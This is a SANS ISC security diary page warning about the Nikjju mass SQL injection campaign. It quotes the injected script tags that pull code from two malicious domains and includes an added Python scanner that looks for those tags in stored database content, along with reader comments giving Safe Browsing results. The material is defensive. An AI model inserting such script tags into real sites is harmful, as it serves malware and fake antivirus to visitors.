Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Continued interest in Nikjju mass SQL injection campaign - Internet Security | DShield SANS ISC InfoSec Forums


Continued interest in Nikjju mass SQL injection campaign

Readers continue to write in, conveying updates from sources regarding the Nikjju mass SQL injection campaign. As with the Lilupophilupop campaign from December, ASP/ASP.NET sites are targeted and scripts are inserted.

Be wary of <script src= hxxp://nikjju.com/r.php ></script> or <script src = hxxp://hgbyju.com/r.php ></script> and the resulting fake/rogue AV campaigns they subject victims to.

Estimates of the infected site count vary wildly, but a quick search for the above strings will give you insight. Handler Mark H continues to track this one and indicates that the MO is similar to the Lilupophilupop campaign but that they're trying some interesting things this round. We'll report if anything groundbreaking surfaces.

As always, if you have logs to share, send them our way via the contact form, or comment with any insight you want to share with readers.

Russ McRee | @holisticinfosec

 

 

Russ McRee

182 Posts
ISC Handler
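
A site owner can check their own stored content for the two script tags named in the diary entry. The following is an added example, not code from the diary or from ISC; it assumes text columns have been exported as (table, key, column, value) tuples, and the table and column names and the sample rows are constructed.

```python
import html
import re
from urllib.parse import urlsplit

# Hosts named in the diary entry (written there defanged, as hxxp://...).
CAMPAIGN_HOSTS = {"nikjju.com", "hgbyju.com"}

# Opening <script> tag with a src attribute; tolerant of case, spacing,
# optional quotes and a malformed or missing closing tag.
SCRIPT_SRC = re.compile(
    r"<\s*script\b[^>]*?\bsrc\s*=\s*[\"']?\s*([^\s\"'<>]+)", re.IGNORECASE)

def script_hosts(text):
    """Return the lower-cased host of every <script src=...> found in text."""
    hosts = []
    # Stored values are sometimes HTML-encoded, so decode entities first.
    for match in SCRIPT_SRC.finditer(html.unescape(text or "")):
        src = re.sub(r"^hxxp", "http", match.group(1), flags=re.IGNORECASE)
        if src.startswith("//"):          # protocol-relative URL
            src = "http:" + src
        try:
            hosts.append((urlsplit(src).hostname or "").lower())
        except ValueError:                # unparsable URL: nothing to compare
            continue
    return hosts

def is_campaign_host(host):
    """Exact host or subdomain match; 'nikjju.com.example.org' does not match."""
    return any(host == h or host.endswith("." + h) for h in CAMPAIGN_HOSTS)

def scan_rows(rows):
    """rows: (table, key, column, value) tuples. Return one hit per bad tag."""
    return [(table, key, column, host)
            for table, key, column, value in rows
            for host in script_hosts(value)
            if is_campaign_host(host)]

# Constructed sample rows (hypothetical table and column names).
SAMPLE_ROWS = [
    ("news", 1, "title", "Spring sale<script src= hxxp://nikjju.com/r.php ></script>"),
    ("news", 2, "body", "&lt;SCRIPT SRC=hxxp://HGBYJU.com/r.php&gt;&lt;/script&gt;"),
    ("news", 3, "body", '<script src="/js/site.js"></script> mentions nikjju.com'),
    ("news", 4, "body", "<script src=hxxp://nikjju.com.example.org/a.js></script>"),
    ("news", 5, "title", None),
]
```

Rows 3 to 5 are negatives: a local script next to a plain-text mention of the domain, a look-alike host, and a NULL value.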
Has anyone posted the initial SQL Injection attack payload?
Anonymous
@ Ryan ... 'along those lines:
- http://google.com/safebrowsing/diagnostic?site=nikjju.com
"... the last time suspicious content was found on this site was on 2012-04-24. Malicious software includes 19 trojan(s), 3 exploit(s)..."
- http://google.com/safebrowsing/diagnostic?site=hgbyju.com
"... the last time suspicious content was found on this site was on 2012-04-23. Malicious software includes 2 trojan(s)..."
- http://google.com/safebrowsing/diagnostic?site=AS:42926
"... over the past 90 days, 404 site(s),... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-04-24, and the last time suspicious content was found was on 2012-04-24..."
.
Jack

160 Posts
